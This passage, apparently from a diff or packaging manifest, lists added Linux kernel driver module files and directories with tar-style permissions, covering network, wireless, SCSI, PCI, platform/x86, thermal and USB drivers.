+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/cadence/macb.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/cisco/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/cisco/enic/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/cisco/enic/enic.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/dec/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/dec/tulip/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/dec/tulip/de2104x.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/dec/tulip/de4x5.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/dec/tulip/dmfe.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/dec/tulip/tulip.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/dec/tulip/uli526x.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/dec/tulip/winbond-840.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/dlink/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/dlink/dl2k.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/dlink/sundance.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/emulex/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/emulex/benet/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/emulex/benet/be2net.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/hp/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/hp/hp100.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/intel/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/intel/e100.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/intel/e1000/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/intel/e1000/e1000.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/intel/e1000e/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/intel/e1000e/e1000e.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/intel/igb/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/intel/igb/igb.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/intel/igbvf/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/intel/igbvf/igbvf.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/intel/ixgb/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/intel/ixgb/ixgb.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/intel/ixgbe/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/intel/ixgbe/ixgbe.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/intel/ixgbevf/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/intel/ixgbevf/ixgbevf.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/marvell/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/marvell/mvmdio.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/marvell/skge.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/marvell/sky2.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/natsemi/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/natsemi/natsemi.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/natsemi/ns83820.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/nvidia/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/nvidia/forcedeth.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/realtek/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/realtek/8139cp.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/realtek/8139too.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/realtek/r8169.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/via/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/via/via-rhine.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/ethernet/via/via-velocity.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/mdio.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/mii.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/nlmon.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ath/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ath/ath.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ath/ath10k/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ath/ath10k/ath10k_core.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ath/ath10k/ath10k_pci.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ath/ath5k/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ath/ath5k/ath5k.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ath/ath6kl/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ath/ath6kl/ath6kl_core.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ath/ath9k/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ath/ath9k/ath9k.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ath/ath9k/ath9k_common.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ath/ath9k/ath9k_htc.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ath/ath9k/ath9k_hw.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/broadcom/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/broadcom/b43/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/broadcom/b43/b43.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/broadcom/b43legacy/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/broadcom/b43legacy/b43legacy.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/intel/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/intel/ipw2x00/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/intel/ipw2x00/ipw2100.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/intel/ipw2x00/ipw2200.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/intel/ipw2x00/libipw.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/intel/iwlegacy/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/intel/iwlegacy/iwl3945.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/intel/iwlegacy/iwl4965.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/intel/iwlegacy/iwlegacy.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/intel/iwlwifi/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/intel/iwlwifi/dvm/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/intel/iwlwifi/dvm/iwldvm.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/intel/iwlwifi/iwlwifi.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/intel/iwlwifi/mvm/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/intel/iwlwifi/mvm/iwlmvm.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ralink/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ralink/rt2x00/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ralink/rt2x00/rt2400pci.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ralink/rt2x00/rt2500pci.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ralink/rt2x00/rt2800lib.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ralink/rt2x00/rt2800mmio.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ralink/rt2x00/rt2800pci.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ralink/rt2x00/rt2x00lib.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ralink/rt2x00/rt2x00mmio.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ralink/rt2x00/rt2x00pci.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/ralink/rt2x00/rt61pci.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/realtek/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/realtek/rtlwifi/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/realtek/rtlwifi/btcoexist/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/realtek/rtlwifi/btcoexist/btcoexist.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/rtl8188ee.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/realtek/rtlwifi/rtl8192c/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/realtek/rtlwifi/rtl8192c/rtl8192c-common.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/realtek/rtlwifi/rtl8192ce/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/realtek/rtlwifi/rtl8192ce/rtl8192ce.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/realtek/rtlwifi/rtl8192de/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/realtek/rtlwifi/rtl8192de/rtl8192de.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/realtek/rtlwifi/rtl8192se/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/realtek/rtlwifi/rtl8192se/rtl8192se.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/realtek/rtlwifi/rtl8723ae/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/realtek/rtlwifi/rtl8723ae/rtl8723ae.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/realtek/rtlwifi/rtl8723com/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/realtek/rtlwifi/rtl8723com/rtl8723-common.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/realtek/rtlwifi/rtl_pci.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/net/wireless/realtek/rtlwifi/rtlwifi.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/nvdimm/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/nvdimm/libnvdimm.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/nvdimm/nd_blk.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/nvdimm/nd_btt.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/nvdimm/nd_pmem.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/pci/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/pci/host/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/pci/host/vmd.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/pci/hotplug/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/pci/hotplug/acpiphp_ibm.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/pci/hotplug/cpcihp_generic.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/pci/hotplug/cpcihp_zt5550.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/pci/hotplug/shpchp.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/pcmcia/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/pcmcia/i82092.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/pcmcia/pcmcia.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/pcmcia/pcmcia_core.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/pcmcia/pcmcia_rsrc.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/pcmcia/pd6729.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/pcmcia/yenta_socket.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/acer-wmi.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/acerhdf.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/alienware-wmi.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/amilo-rfkill.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/apple-gmux.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/asus-laptop.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/asus-wireless.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/classmate-laptop.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/compal-laptop.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/dell-rbtn.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/dell-smo8800.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/dell-wmi-aio.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/fujitsu-laptop.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/fujitsu-tablet.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/hdaps.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/hp-wireless.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/hp-wmi.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/hp_accel.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/ibm_rtl.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/ideapad-laptop.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/intel-hid.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/intel-rst.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/intel-smartconnect.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/intel-vbtn.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/intel_ips.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/intel_menlow.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/intel_oaktrail.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/intel_pmc_ipc.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/intel_punit_ipc.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/msi-laptop.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/msi-wmi.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/mxm-wmi.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/panasonic-laptop.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/pvpanic.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/samsung-laptop.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/samsung-q10.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/sony-laptop.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/surfacepro3_button.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/thinkpad_acpi.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/topstar-laptop.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/toshiba-wmi.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/toshiba_bluetooth.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/toshiba_haps.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/platform/x86/wmi.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/pps/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/pps/pps_core.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/ptp/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ptp/ptp.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/regulator/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/regulator/gpio-regulator.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/regulator/userspace-consumer.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/3w-9xxx.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/3w-xxxx.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/BusLogic.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/a100u2w.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/aacraid/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/aacraid/aacraid.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/advansys.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/aic7xxx/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/aic7xxx/aic79xx.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/aic7xxx/aic7xxx.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/aic94xx/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/aic94xx/aic94xx.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/arcmsr/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/arcmsr/arcmsr.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/atp870u.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/dc395x.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/dmx3191d.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/dpt_i2o.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/eata.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/fdomain.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/gdth.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/hpsa.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/hptiop.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/initio.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/ipr.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/ips.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/libiscsi.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/libsas/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/libsas/libsas.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/lpfc/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/lpfc/lpfc.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/megaraid.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/megaraid/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/megaraid/megaraid_mbox.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/megaraid/megaraid_mm.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/megaraid/megaraid_sas.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/mpt3sas/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/mpt3sas/mpt3sas.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/mvsas/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/mvsas/mvsas.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/qla1280.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/qla2xxx/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/qla2xxx/qla2xxx.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/qla4xxx/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/qla4xxx/qla4xxx.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/scsi_transport_fc.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/scsi_transport_iscsi.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/scsi_transport_sas.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/scsi_transport_spi.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/snic/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/snic/snic.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/stex.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/sym53c8xx_2/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/scsi/sym53c8xx_2/sym53c8xx.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/spi/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/spi/spi-bitbang.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/spi/spi-dw-midpci.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/spi/spi-dw-mmio.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/spi/spi-dw.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/ssb/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/ssb/ssb.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/thermal/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/thermal/int340x_thermal/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/thermal/int340x_thermal/acpi_thermal_rel.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/thermal/int340x_thermal/int3400_thermal.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/thermal/int340x_thermal/int3402_thermal.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/thermal/int340x_thermal/int3403_thermal.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/thermal/int340x_thermal/int3406_thermal.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/thermal/int340x_thermal/int340x_thermal_zone.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/thermal/int340x_thermal/processor_thermal_device.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/thermal/intel_pch_thermal.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/thermal/intel_powerclamp.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/thermal/intel_soc_dts_iosf.ko
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/thermal/intel_soc_dts_thermal.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/uio/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/uio/uio.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/usb/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/usb/class/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/usb/class/cdc-acm.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/usb/mon/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/usb/mon/usbmon.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/usb/storage/
+-rw-r--r--	root/root	lib/modules/<kernel-version>/kernel/drivers/usb/storage/usb-storage.ko
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/video/
+drwxr-xr-x	root/root	lib/modules/<kernel-version>/kernel/drivers/video/backlight/
